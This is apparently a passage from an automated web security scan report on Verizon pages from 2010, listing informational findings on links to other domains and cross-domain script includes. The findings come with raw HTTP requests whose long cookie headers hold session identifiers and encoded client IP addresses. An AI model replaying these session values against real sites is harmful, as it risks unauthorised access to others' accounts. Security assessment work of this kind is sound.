GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx?NRMODE=Published&NRNODEGUID=%7bAB8BA7AD-DEF3-46C6-A604-9A615595AE37%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fHSIvsCable%2fHSIvsCable.htm%3fCMP%3dBAC-MXT_D_P2_CS_Z_Q_N_Z330&NRCACHEHINT=ModifyGuest&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71589
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<LI><A style="WIDTH: 63px" id=GHWireless title="Verizon Wireless" href="http://www.verizonwireless.com/" name=&lid=hp_wireless_tab>Wireless</A>
...[SNIP]...
<LI><A href="http://www.verizonwireless.com/b2c/index.html" name=&lid=overlay_phone_wireless><IMG alt="" src="/Content/Commonfiles/images/globalheader/new_header/i/wireless.gif">
...[SNIP]...
<DIV class="col12 clear icons"><A href="http://www.bbbonline.org/cks.asp?id=108072593112" name=&lid=hp_res_footer_bbb_logo target=_blank><IMG alt="Click to verify BBB accreditation and to see a BBB report." src="/Content/LearnShop/Images/footer/bbb.jpg"></A><A href="http://www.truste.org/ivalidate.php?url=www.verizon.com&sealid=101" name=&lid=hp_res_footer_truste_logo target=_blank><IMG class=bright alt="Reviewed by TRUSTe site privacy statement." src="/Content/LearnShop/Images/footer/truste.jpg">
...[SNIP]...
<LI><A href="http://www.thinkfinity.org/" name=&lid=hp_bus_footer_vzthinkfinity>Verizon Thinkfinity</A>
...[SNIP]...

7.3. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiostv/web/unprotected/showtime.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /fiostv/web/unprotected/showtime.aspx?CMP=DMC-SMP_D_ZZ_ZZ_E_DO_N_X001 HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
RequestInfo: Served From :: BHDP1ISFTW06, Time Taken :: 15.6246
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24548
Date: Sat, 20 Nov 2010 03:04:03 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=jr5uzw45kvcuwa554k2q0s2i; path=/; HttpOnly
Set-Cookie: DCReferringURL=/ShowTime.aspx; path=/


<html>
<body onload=ShowtimePlayer()>
<link rel="stylesheet" type="text/css" href="/fiostv/web/Resources/V_111510_1425/css/FTVStyles.css">

<script type="text/javascript">
var TargetURL = '
...[SNIP]...
<div class="Fl_ST"><a href="https://twitter.com/SHOsports" target="_blank">SHOWTIME SPORTS</a>
...[SNIP]...

8. Cross-domain script include  previous  next
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


8.1. http://www22.verizon.com/Residential/HighSpeedInternet/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75349
Expires: Sat, 20 Nov 2010 03:07:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:07:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<!--HighSpeedInternet Overview Page--><script type="text/javascript" src="http://d1qpxk1wfeh8v1.cloudfront.net/tags/tt16_1002.js" ></script>
...[SNIP]...

8.2. http://www22.verizon.com/Residential/HighSpeedInternet/Overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Overview/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Residential/HighSpeedInternet/Overview/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75372
Expires: Sat, 20 Nov 2010 03:15:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<!--HighSpeedInternet Overview Page--><script type="text/javascript" src="http://d1qpxk1wfeh8v1.cloudfront.net/tags/tt16_1002.js" ></script>
...[SNIP]...

8.3. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 103922
Expires: Sat, 20 Nov 2010 03:13:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:13:17 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<!--HighSpeedInternet Overview Page--><script type="text/javascript" src="http://d1qpxk1wfeh8v1.cloudfront.net/tags/tt16_1002.js" ></script>
...[SNIP]...

8.4. http://www22.verizon.com/Residential/aboutFiOS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Residential/aboutFiOS/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; 